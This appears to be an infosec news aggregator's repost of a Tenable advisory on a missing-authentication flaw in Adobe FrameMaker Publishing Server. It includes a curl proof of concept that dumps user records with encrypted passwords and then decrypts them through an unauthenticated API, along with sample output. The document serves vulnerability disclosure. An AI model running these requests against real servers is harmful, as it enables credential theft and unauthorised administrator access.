all InfoSec news
Missing Authentication for Critical Function in Adobe FrameMaker Publishing Server (FMPS)
Feb. 13, 2024, 6:09 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
A vulnerability regarding missing authentication exists in Adobe FrameMaker Publishing Server (FMPS). This allows an unauthenticated remote attacker to access FMPS REST APIs. For example, the attacker can fetch user information (including encrypted password) for all FMPS users. The encrypted password can be decrypted by accessing a FMPS API. This allows the attacker to login to FMPS.
Proof of Concept
# curl 'http://:7000/v16/server/auth/'
[{"accessTokenExpires":"-1","userPermission":"ADMIN","userType":"ADMIN","userString":"NA","email":"fmpsuserAAA@enterprise.com","__schemaVersion":"16","_id":"6578e4aef9492a045082c7d7","username":"fmpsuserAAA","password":"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e","user_denorm_string":"{\"_id\":\"6578e4aef9492a045082c7d7\",\"accessTokenExpires\":\"NA\",\"email\":\"fmpsuserAAA@enterprise.com\",\"password\":\"6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e\",\"userPermission\":\"ADMIN\",\"userString\":\"NA\",\"userType\":\"ADMIN\",\"username\":\"fmpsuserAAA\"}","__v":0,"accessToken":""}]
#curl -d 'password=6c2395917d6e121b3cb835c1ce9f69aaa1a9240cfab0cc0fe7df3e' 'http://:7000/v16/server/auth/decryptPassword'
"fmpsuserAAA" …
accesstoken admin adobe authentication critical email enterprise function missing password publishing server username
More from www.tenable.com / Tenable Research Advisories
Fluent Bit Memory Corruption Vulnerability
2 weeks, 1 day ago |
www.tenable.com
Cross-Site Scripting in WordPress RSS Aggregator Plugin
2 weeks, 4 days ago |
www.tenable.com
Solidus Stored Cross-Site Scripting
2 weeks, 4 days ago |
www.tenable.com
Delta Electronics DIAEnergie CEBC.exe Multiple Vulnerabilities
3 weeks, 5 days ago |
www.tenable.com
Approach.App Multiple Vulnerabilities
1 month, 1 week ago |
www.tenable.com
Path Traversal Affecting Multiple CData Products
1 month, 3 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Sr. Product Manager
@ MixMode | Remote, US
Corporate Intern - Information Security (Year Round)
@ Associated Bank | US WI Remote
Senior Offensive Security Engineer
@ CoStar Group | US-DC Washington, DC